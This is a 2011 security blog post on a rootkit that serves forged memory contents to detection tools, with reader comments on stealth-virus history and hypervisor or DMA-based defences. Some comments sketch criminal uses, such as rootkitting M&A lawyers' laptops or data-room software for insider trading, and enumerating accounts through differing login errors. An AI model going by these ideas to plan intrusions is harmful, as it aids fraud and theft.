Forged Memory

A scary development in rootkits:

Rootkits typically modify certain areas in the memory of the running operating system (OS) to hijack execution control from the OS. Doing so forces the OS to present inaccurate results to detection software (anti-virus, anti-rootkit).

For example rootkits may hide files, registries, processes, etc., from detection software. So rootkits typically modify memory. And anti-rootkit tools inspect memory areas to identify such suspicious modifications and alarm users.

This particular rootkit also modifies a memory location (installs a hook) to prevent proper disk access by detection software. Let us say that location is X. It is noteworthy that this location X is well known for being modified by other rootkit families, and is not unique to this particular rootkit.

Now since the content at location X is known to be altered by rootkits in general, most anti-rootkit tools will inspect the content at memory location X to see if it has been modified.

[…]

In the case of this particular rootkit, the original (what’s expected) content at location X is moved by the rootkit to a different location, Y. When an anti-rootkit tool tries to read the contents at location X, it is served contents from location Y. So, the anti-rootkit tool thinking everything is as it should be, does not warn the user of suspicious activity.

Posted on May 6, 2011 at 12:32 PM46 Comments

Comments

Craig May 6, 2011 12:40 PM

MS-DOS viruses were doing this sort of thing 20 years ago. It’s not really a new development.

ole May 6, 2011 12:40 PM

Way back when a member of the stoned family used this technique. Monkey hooked an interupt so you could not get to the C:, but if you used fdisk to view the partition table then you bumped it off the hook and could proceed to remove it! Have the criminal element figured out what we know yet?

ole.

Todd Knarr May 6, 2011 12:52 PM

Not new. This sounds like standard stealth-virus behavior. Hook into the interrupt vectors, for instance, and set page protection up so if something executed the hook it used what the virus had planted there but a normal read (non-execution) of the memory triggered a fault that let the virus substitute the original data so someone scanning the interrupt vector memory wouldn’t see the virus’s hook in place. That in turn was derived from disk-related stealthing: hook the disk IO routines and check where the read of an infected file/area is coming from. If it’s part of load or execution, leave it have the modified data. If it’s not, if it’s something just trying to read it as data, then substitute the original data so disk scans don’t see the virus.

Stuff like this is why the fundamental rule: you can’t scan for an infection using the potentially infected system, because if it’s infected it can lie to your scanning software.

KevC May 6, 2011 1:10 PM

It is true that this technique may not be new to a lot of experienced people. However, the significance here (as pointed out by Bruce) is that older techniques have been harder to implement in modern operating systems.

Now that methods of getting code up into those areas of the OS, the older techniques can come back to mainstream usage… and that’s a scary thought.

Cat and mouse. The next generation operating systems will prevent this type of low-level rooting once again, and following that we will see someone else figure out how to get past it – bringing this code-migration technique back into the limelight again and again.

Michael T. Babcock May 6, 2011 1:17 PM

Certain operating systems are wiser and use randomised memory locations to avoid many such attacks. This is an old technique and an OS that doesn’t plan around it is just lazy.

sigquit May 6, 2011 1:38 PM

Well, isn’t this the modern-day equivalent of the good old INT 21h hooking?

Tony May 6, 2011 1:44 PM

Shouldn’t a good root kit detector run from a separate OS environment (booted from a CD or USB stick)? If the BIOS has been compromised, this is no good – but should avoid most of the usual ways that rootkits hide themselves from detection.

staudenmaier May 6, 2011 2:01 PM

Most rootkits I’ve seen hide in something like a hard disk driver file (*.SYS) which can be replaced with a clean copy. I depend, however, on antivirus software to spot the rkit in memory, so this is indeed a nasty development.

staudenmaier May 6, 2011 2:07 PM

But booting OUTSIDE the regular OS will definitely help clean these things out.

Brendan Kidwell May 6, 2011 2:14 PM

I’m not an operating system or virtualization expert, but my understanding is that if you’re running a hypervisor under the actual OS that thinks it’s in charge, redirecting reads for a particular block of memory depending on who is trying to read them isn’t all that surprising.

You MIGHT be able to counteract this if you measure the difference in timings for accessing memory location X versus other locations unlikely to have been tampered with.

Roy May 6, 2011 2:42 PM

I use a shell script to check that reported free space is really there. It repeatedly calls …

dd if=/dev/zero of=/tmp/$s bs=1g count=1

… writiing the iteration number to the SO each pass until all available free space is overwritten, then deletes those files. If it failed to reach the right number, then I know the memory accounting has been gaffed.

Clive Robinson May 6, 2011 3:28 PM

This is not new as many people have pointed out and as one person has pointed out it’s “a cat and mouse game” that unfortunatly has no end in a single CPU architecture.

The simple solution is to have a seperate state machine acting as a hypervisor, every so often it halts the main CPU and scans a block of OS “read only” memory if it does not find the correct hash value it then sets an exception (what is done with this is another matter).

The state machine does not have to scan the whole OS memory in one go because the CPU has no idea of which is the next block that is going to be scanned or when (it’s halted and thus is effectivly only aware that time has passed).

For those few who forever argue that there can be “perfect AVirus / AMalware / ARootKit” software running on a single CPU, they are wrong it can not be done (you can get very close however but 99.99..% is not 100% and never will be). This fact was known and accepted by the mathmatical community before the first electronic computers were built. The problem is that no system of logic that is realisticaly of any use can be used to describe / check it’s self.

However that aside the simple fact is there are a number of sufficiently good OS’s out there (and no I’m not talking *nix) that can better use the hardware security features currently built into comodity CPU’s such that this sort of attack is currently unlikely to succeed (if this will remain the case in the future is another issue).

Will May 6, 2011 4:04 PM

keen as we all are to shout “prior art” and feel superior – the articles picking this up that I’ve read say such techniques have been talked about before – it is a first for a real live wild rootkit, right?

asd May 6, 2011 4:21 PM

If root-kits have to stay in none paged memory, couldn’t you compare the size of a device driver to its non paged memory, if the same it probable is a root-kits?

Someone May 6, 2011 4:22 PM

ShadowWalker did that, presentation was Blackhat ’05 and the code for the TRON rootkit is publicly available. Hardly something new.

Dom De Vitto May 6, 2011 5:35 PM

I think “Trusteer Rapport” (among other things) checks the call gates and hooks are in line with ‘normal’ Windows systems, and replaces unknown hooks.

All pretty standard ‘find something that doesn’t look right’ detection, that’s an uncommon, but obviously useful approach.

Maybe someone should tell the AV companies to stop with the snake-oil and enterprise GUIs and actually bring their products into the 21st century 🙁

Richard Steven Hack May 6, 2011 6:01 PM

There are two problems here:

1) First, if the rootkit is running in memory and you try to detect it using a tool on the running system, the rootkit will beat you.

2) If you boot from an external OS such as Ultimate Boot CD For Windows (UBCD4Win), the rootkit is not running in memory so unless you have a file signature, you won’t detect it.

The only program I know of that attempts to cover these situations is Malwarebytes Antimalware, which is specifically recommended to be run on the compromised running system in order to detect these sorts of malware. It is not recommended to run it from a boot CD as its effectiveness is greatly reduced.

The problem with that, of course, is that the malware can be designed to detect and disable Malwarebytes.

A-a-a-n-n-d-d-d we’re back to square one. 🙂

Probably the only way to deal with this sort of thing is to run ALL the rootkit detectors both from the compromised system and from a boot CD. That at least forces the malware designer to defeat ALL the detection systems specifically.

It would be even better if an AV detector could be designed that boots the compromised system into a VM and checks the running virtual system from an external position on an external bootable host.

Designing something like that which could be used by normal end users is probably impossible. Even getting one usable by knowledgeable techs probably would be difficult. This is because the external checking tools would have to be very low level and would require considerable system programming knowledge to interpret the results – unless they were totally automated to remove any possible rootkit or repair the system to spec, thus removing the rootkit.

Nick P May 6, 2011 11:25 PM

@ Richard Steven Hack

“Probably the only way to deal with this sort of thing is to run ALL the rootkit detectors both from the compromised system and from a boot CD.”

That’s how microsoft’s strider ghostbuster rootkit detector works. I don’t think it covers this attack vector currently.

“It would be even better if an AV detector could be designed that boots the compromised system into a VM and checks the running virtual system from an external position on an external bootable host.”

I don’t think it would be as hard as you make it sound. One academic paper a year or two ago published an evil maid type attack that hooks into a hibernated system as it boots back up, which is much scarier than this attack. But that same technique might be reapplied to detect this kind of infection.

Rob May 7, 2011 8:44 AM

@Eam:

Unless that’s a bad link, that’s a completely different technique. Or rather, that’s not what’s doing the forging. There’s no mention of the debug registers there.

@Dom De Vitto:
That’s the point of this rootkit. It breaks things like that.

markus May 7, 2011 11:12 AM

Boring and shadowalker, is a Bad copy of Joanna rutkowska’s dma northbridge rootkit

Kevin May 7, 2011 4:21 PM

Like a few have said, definitely not new (seems to be a variation on http://www.phrack.org/issues.html?issue=65&id=8#article) but it’s interesting to see that despite this, the anti-virus vendors don’t seem to be prepared for it. It makes me wonder if it’s already been in the wild for a while and it’s only now that they’ve actually noticed it.

Clive Robinson May 8, 2011 12:11 AM

@ Eam,

“Imagine the threats we’d be facing if these virus writers actually did a bit of googling before firing up the IDE.”

Err you apear tob forgetting the principle of ‘the low hanging fruit’.

That is, why as an attack developer, would you use an attack any more sophisticated than ‘gets the job done’?

The only reason for doing so is ‘longevity’, and this will always be tempered by ‘expected detection time’.

If your attack is designed to steal credit card numbers and you (or others) use them fairly immediatly then you would expect people to be looking for your attack code no more than three months after you start using the credit card info.

As credit card info ages fairly quickly (ie they expire two years after issue) you want to use them whilst they are still ‘fresh’.

[To see how fast they age make a simple assumption you steal 1million unique CC records from a companies sales reconciliation system. With a 2year expiry time you would expect 1/(365*2) or 0.137% to become invalid for every day after their last use. So you would expect 0.137% of the cards used yesterday to be not working, 50% of those used one year ago and all used two years or more ago. If the million unique records are spread evenly across one year thats 2740 records for each day. So you would expect 3.75 of the cards used yesterday to be now invalid, 7.5 from the day before and 1370 of the cards used a year ago today. You can therefore see you would expect 1/4 or 250000 records to be invalid on the day you steal them and to lose another 1370/day thereafter, thus only 1/4 would be valid after a year.]

So depending on how the card info is exploited it might take two months for complaint to be made to the CC companies. And investigators another two or three months to collect sufficient data to correlate the information and then find the code etc responsable. At which point the code no mater how good will get blocked.

So effectivly with only a 4-5 month life span you would use the first attack that worked.

However with something like an APT stealth attack you are looking at the life span of the OS as the upper limit, so four to six years. So a carefully selected vector with a carefully crafted agent would be expected.

As a consequence you would expect to see many many times the number of quick and dirty attacks for short lived CC data that you would for a stealth APT. Which appears to correlate with what we do see (Stuxnet being the only example of APT code that most people are aware of).

Doug Coulter May 8, 2011 10:51 AM

Clive, you’ve hit it on the head again. But CC’s aren’t the only possible targets for malware, just as you say “the low hanging fruit”.

Consider some other possibilities. “High net worth individuals” might be one. Many, being human, are up to this and that, and knowing just what might allow you to siphon some money off them – blackmail, or just following a big stock trader and front running his trades.

Another is a big company, big enough that invoicing and purchasing isn’t fully tracked by a single individual. Getting into their system to have it send you money against fake PO’s might have a rather long lifetime if you’re not too greedy and just create a flow of money.

So, for a criminal, there’s a use for a long lived rootkit that can simply send info back to the controller for uses other than swiping a CC with a short life. Done right, the victim never even realizes there’s a rootkit there – you just use the gathered information in other ways.

Think “insider trading” if you breach a law firm that does mergers…just for one. All you need from the target is info, and you never attack them to make them aware of the problem.

You might not need to change many bits in the target system at all — maybe none, or just adding your fake money dump to their “approved vendors” list.

Luckily, most criminals don’t realize that you can make good money with the same skills wearing the other color hat – and with a lot less risk. I suspect that for very high value targets though, this has been and is being done — and by the very nature of it, doesn’t get reported.

Nick P May 8, 2011 4:15 PM

@ Clive Robinson

“Stuxnet being the only example of APT code that most people are aware of”

Actually, I think most people have heard of the Windows and UNIX family of operating systems. They are currently the most sophisticated APT’s available. They facilitate monitoring, stealth, massive data exfiltration, MITM, subversion and deception for social engineering attacks. You know you have the best rootkit when the next best rootkits (e.g. Zeus and Stuxnet) leverage your functionality to get the job done. 😉

RobertT May 8, 2011 9:38 PM

@Doug Coulter
“Think “insider trading” if you breach a law firm that does mergers…just for one. All you need from the target is info, and you never attack them to make them aware of the problem.”

I’ve mentioned M&A’s as a huge security problem a few times, over the last year, but most people don’t seem to understands the value of this data or even just the metadata associated with the “virtual data room” access.

Each of these “virtual data room” systems requires the users to download and install a secure communications tool that enables the whole “virtual data room comms” process. Ideally I want to rootkit their “secure system” software, that way I’m in on every deal, from day one AND I get to view the progress of the DD.

Alternatively I intentionally rootkit the laptops of the lawyers of any aggressive acquirer. Any M&A DD must involve the head of the legal team, so I’m in the door real early. The thing is I don’t really need to know the exact details or snoop at the encrypted packets because I know that most M&A’s occur at valuations of 30% above the average trading level for the past 6 months. A three month investment for a 30% low risk return! I’m in! Also the earlier you are in the less suspicious it looks to any SEC investigator. Naturally it also helps if you don’t reside in the US (see the recent HK insider trading cases dropped)

So I think tightly targeted “rootkits” are a huge problem that the M&A industry is completely ignoring. I seriously doubt that the criminal hackers are obliging by also ignoring this “low hanging fruit”

Sometimes the metadata is completely insecure, simple examples that I’ve seen include:
Access account name is the actual name of the target company:
The error message for a failure to log into the data room is different if a data room exists, under that company name, than if there is no data room. Conclusion: data room exists!

Data room Access accounts are usually established in the names of the potential acquires.:
A fail to log in under that userID (acquires company name) is a different error message when the userID exists than when it does not exist.

The virtual data room “secure system” software is honestly that pathetic!

smartGuy May 8, 2011 11:13 PM

Actually this is a new development. It is not just a simple case of hooking interrupt vectors if this works under Windows. Windows clears all ISRs before switching into protected mode. In order to perform this move, modifications to the kernel image must have been performed from real mode whilst avoiding checksum checks.

Clive Robinson May 9, 2011 6:56 AM

@ Nick P,

“Actually, I think most people have heard of the Windows and UNIX family of operating systems”

8)

However you raise a point we tend not to hear much spoken about,

“They facilitate monitoring, stealth massive data exfiltration…”

In some respects the monitoring and data exfiltration is what the attack is all about these days.

That is times have changed, those getting into your systems these days are mainly doing it for profit not vanity or bragging rights. The script kiddy attacks and web site defacements are by no means dead but are at best a side show these days.

However what are the majority of organisations defending against?

Mainly ‘known attack vectors’ getting through the firewall.

But in most cases not the outbound data from those attacks that got through the firewall one way or the other (ie pushed by the attacker or pulled in by a user clicking on something).

To me this has always seemed a bit daft, it’s a bit like an old medieval town where the gate keepers are busy making sure that all inbound goods have the correct revenue applied, but ignore the outbound waggons one of which has the contents of the less than well guarded treasury on board.

One example was the modified version of the Zeus attack on .mil and .gov that hovered up .doc and .pdf files. It was only discovered because a network admin saw huge spikes in outbound traffic.

The problem is that many network etc admins are like the gate keepers they are to busy checking inbound traffic for contraband and ignoring outbound traffic with the crown jewels.

You need to do both just as diligently, because there will always be unknown attacks that get through the fire wall, AV and malware detectors, file system trip wires etc.

As we know from recent press some security related firms appear to be trying (lastpass.com) to do this and some appear not (RSA, Sony, etc).

One of the things that does kind of make me wonder what people are thinking when you hear the China APT mob go on about the removal of data in gigabyte and terrabyte quantities from individual sites or organisations. Surely these organisations can’t be so large that, that level of network traffic does not show up in the logs?

Paeniteo May 9, 2011 6:59 AM

@Richard Steven Hack:
“It would be even better if an AV detector could be designed that boots the compromised system into a VM and checks the running virtual system from an external position on an external bootable host.”

I remember reading a paper which argued that it would be ultimately impossible to hide the fact you are running inside a VM from a process within the VM (all mitigations introduce new detectable “oddities” which would need to be mitigated again and so on). Hence, the rootkit could detect the scanner, resulting in (to put it with your own words):

“A-a-a-n-n-d-d-d we’re back to square one. :-)”

😉

Clive Robinson May 9, 2011 9:20 AM

@ Paeniteo,

“Hence, the rootkit could detect the scanner,”

In theory yes, in practice “could” works both ways and is thus probabilistic in nature.

It is also criticaly dependent on the resourses available to it. The root kit requires memory and CPU resources to detect the scanner and camouflage it’s self. If it does not have sufficient of either then it cannot achive either the detection the camouflage or both…

Further the scanner can use the same techniques to detect the root kit as the root kit uses to detect the scanner. However the scanner actualy can have the advantage especialy if it runs outside of the generalcomputing environment the root kit is occupying.

Consider it this way, the root kit is trying to occupy the highest privaledged position within the general computing environment it can as either above or part of the OS (or with some OS’s the drivers). Ask what happens if it can not occupy that position?

What if that high ground position is occupied by a hypervisor running in it’s own environment outside of the general computing environment?

And what if the OS the root kit is trying to supplant is in a resource limited environment?

Then there is the issue of the OS “signature”, the OS in it’s normal state performs certain actions in certain ways and uses a known set of resources such as memory and CPU cycles.

That signiture can be monitored and aberant behaviour detected.

Admittedly our current commodity OS’s are written in a monolithic manner which makes the signature overly complex to monitor currently. However some micro kernels can be re-written in ways that make the monitoring of the signiture much much easier.

The step people have to make is getting away from the CPU monitoring it’s self, and think about a hypervisor running on it’s own hardware environment.

We can actually do this today with a number of DMA interfaces one of which (firewire) has already been highlighted for “black hat” activities. It could just as easily be used for “white hat” activities like a security hypervisor.

kashmarek May 9, 2011 10:19 AM

Recently, I saw an advertisement for a new PC, that allowed internet access without booting into the OS on the disk drive. I believe one of the BIOS makers tried to sell this as an option a couple of years back. Thus, it would seem that the BIOS (or firmware) is already at the point where it can run the computer without your OS and effectively be elevated to a full time always live undetectable rootkit when your OS is running.

Paeniteo May 9, 2011 10:29 AM

@Clive: ‘”could” works both ways’

Yes, and that’s the kind of permanent, reciprocal hide-and-seek games Richard and I were referring to.
I just meant to point out that having the rootkit inside a VM and the scanner outside of it does not solve the problem.
I don’t even think that throwing in dedicated hardware solves that problem (although it would certainly make it harder to detect the scanner and/or hiding from it, just as the VM would do). Or, to put it the other way round, introducing dedicated hardware makes the issue boring, as we might then as well think along the lines of trusted micro-kernels sealed by TPMs.

Siv May 9, 2011 12:14 PM

These hackers have no fear.
They weigh risk vs reward and doing these crimes are profitable and with little if any risk to them.
If they faced consequences, REAL consequences they would find another line of work, or the government employers might change their job titles.

Dirk Praet May 9, 2011 1:03 PM

@ Clive

“Admittedly our current commodity OS’s are written in a monolithic manner which makes the signature overly complex to monitor”

Exactly. Which is why I like OS level virtualisation capabilities such as Solaris zones that can provide separate security domains for different applications. Much easier to monitor.

Davi Ottenheimer May 9, 2011 1:43 PM

I suspect it has a lot to do with the reaction of the investigator. Option 1) report a stunning new development to the press or Option 2) research whether this is new. The reporter also could have done a bit of fact checking with other investigators to confirm the newness.

For what it’s worth, this was my take on a similar finding during an investigation I worked on last March:

http://www.flyingpenguin.com/?p=11118

“Now it seems so commonplace as to be obvious to manipulate memory, and even incorporated into regular development, but back [in 2005] it was Phrackworthy.”

Nick P May 9, 2011 3:56 PM

@ Dirk Praet

OS-level virtualization is only as trustworthy as the OS it runs on and sharing mechanisms. In this light, it poses less issues than full virtualization because things can be more deprivileged and better controlled. However, it’s still a large attack surface. That’s why I favor the compromise of using microkernel platforms and user-mode Linux VM’s. It let’s us isolate security-critical code in a robust way, minimize kernel code, have separate security domains in different VM’s, and reuse legacy drivers and software until more isolated versions are written. Karger taught me the value of producing a series of interim products of increasing assurance to keep a project going.

Perseus/Turaya is a nice example
http://www.emscb.com/content/pages/49558.htm

Jason May 9, 2011 5:09 PM

I think there may also be a subconscious element at play, too.

What we’ve learned in recent years about computer programming and programmer cognition is that in general terms, the longer the bug existed, the harder it is to fix.

When a programmer writes a new bug, the code is fresh in their head, and they can recall the code and speculate about a fix quite easily. Comparatively speaking of course.

Similarly, the detection and counteracting recommendations are still fresh in the minds of the discoverer, the ‘experts’ and the affected parties.

You can speculate from this that if you deploy an exploit right after the paper gets published, it would actually get fixed sooner than if you waited 3 months, for everyone to start to forget about it.

Clive Robinson May 10, 2011 5:03 AM

@ Kashmarek,

“Thus, it would seem that the BIOS (or firmware) is already at the point where it can run the computer without your OS and effectively be elevated to a full time always live undetectable rootkit when your OS is running.”

The BIOS ability to run without aa disk loaded OS has been around since before the earliest IBM PC’s. For instance the Apple ][ had a basic interpreter built in with (if you knew how to do it) the ability to have a number of programs in ram at the same time. There have even been embedded versions of *nix in highend microcontrolers (and for embbeded systems you don’t need the MMU, you don’t on other systems as it’s mainly a conveniance for the loader/linker).

However the BIOS ability to act as a security hypervisor won’t in the ordinary scheam of things work, because it shares the same memory and CPU. Thus the CPU either needs to have the required extended hardware built in or it needs to be added. Arguably the Intel platform (if it was bug free which it’s not) could provide this.

However there is a subtle issue even when the hypervisor memory and CPU is (apparently) isolated from the main CPU and memory. If the hypervisor is not written in the right way then the main memory it sees can end up being interpreted as code. Thus the hypervisor needs to be implemented as an all known state state machine where the data from the main memory can only cause an exception and nothing else. This way the state machine hypervisor fails safe.

@ Siv,

“These hackers have no fear. They weigh risk vs reward and doing these crime are profitable and with little if any risk to them.

These two sentences are at variance with each other. If they had “no fear” they would not “weigh risk vs reward” they would simply go for the reward.

You further say,

“If they faced consequences, REAL consequences they would find another line of work, or the government employers might change their job titles.”

In the main the prosecution of cross jurisdictional border crime is treated in a similar way to a “suspect who has taken flight”. That is via extradition treaty, however many countries either do not have extradition treaties or as in the case of Russia and China legal exceptions for those acting under state authority or not actualy present at the scene of the crime. Other nations (Israel being one) will not extradite people of certain faiths to other countries seen not to be of that faith.

For real consiquences to happen then people need to be tried and convicted either in the country they committed the crime or in some other third party impartial nation. Currently we don’t have the legal mechanism in place except for War Crimes, Crimes Against Humanity and Piracy on the High Seas.

As has been seen with European law (equivalance of court sentance and enforcment across the EU and the European Arrest Warrant) any such process is open to compleate abuse. Further the asymetrical agreement between the US and UK that supposadly was for use against terrorists has and is being abused.

Clive Roinson May 10, 2011 5:37 AM

@ Nick P,

From some of what you have said in the past you have played with DMA over Firewire as a way of getting around various OS / CPU locks.

Have you ever thought about doing a memory checking hypervisor over Firewire?

For instance if the microkernel was made sufficiently light weight with the code writen to be as static as possible (ie relative not absolute branches and jumps, calls via base and table offset) with minimal jump tables for other activities then checking the memory image via DMA can be fast and in many cases non intrusive to the activites of the target CPU.

Further if the microkernel was writen in such a way that any detected anomalys could be corrected by the DMA process it would make exploits difficult.

Further why not actually load the microkernel into the target CPU from the Firewire DMA, this way malware could not get at it (assuming the code was writen correctly) as it would not be stored on localy accessable semimutable media.

Just something for you to think on as say the next step on from your current microkernel solution.

acer May 29, 2011 4:50 AM

If a cpu can workout a+b in proably thousands of ways, how could the program itself not beable to work out it has changed.
Was think if a usermode program trying work something out and a rootkit changed it, couldn’t the program find it.

acer May 29, 2011 5:10 AM

i’m trying to create a anti-virus that will detect and remove root-kits etc, if any one as ideas can you send me a email(ask mod)
Thanks

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.